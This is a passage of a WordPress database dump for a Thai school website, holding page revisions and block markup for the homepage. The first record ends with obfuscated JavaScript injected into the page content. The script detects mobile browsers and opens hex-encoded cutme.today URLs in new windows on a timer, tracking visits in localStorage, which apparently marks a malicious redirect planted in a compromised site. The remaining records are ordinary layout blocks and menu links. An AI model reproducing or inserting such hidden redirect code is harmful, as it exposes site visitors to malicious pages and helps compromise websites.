_0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:25:59','2025-09-11 07:25:59','',14,'http://pakhaeng.ssk.in.th/?p=2027',0,'revision','',0),
(2029,1,'2025-09-11 14:26:47','2025-09-11 07:26:47','','Blue and Yellow Geometric Welcome Messages and Announcement High School Back to School Banner','','inherit','','closed','','blue-and-yellow-geometric-welcome-messages-and-announcement-high-school-back-to-school-banner-2','','','2025-09-11 14:26:47','2025-09-11 07:26:47','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1.png',0,'attachment','image/png',0),
(2030,1,'2025-09-11 14:26:51','2025-09-11 07:26:51','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:image {\"id\":2029,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1-1024x410.png\" alt=\"\" class=\"wp-image-2029\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a 